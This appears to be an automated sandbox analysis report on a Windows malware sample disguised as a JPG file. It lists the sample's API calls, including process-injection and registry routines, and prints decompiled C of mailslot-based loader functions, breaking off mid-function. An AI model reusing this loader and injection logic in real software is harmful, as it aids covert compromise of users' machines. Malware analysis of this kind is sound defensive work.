    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 68262

General

Root Process Name:d3d8sext.exe
Process MD5:3F602782259014F0253ECDEDFEF4D261
Total matches:178
Initial Analysis Report:Open
Initial sample Analysis ID:68262
Initial sample SHA 256:3CCBE128847999E971BF2194D595C7D211A4EB32C8BD53401702A83B3AB73B70
Initial sample name:27Scansione_F24_2018_07.JPG.exe

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
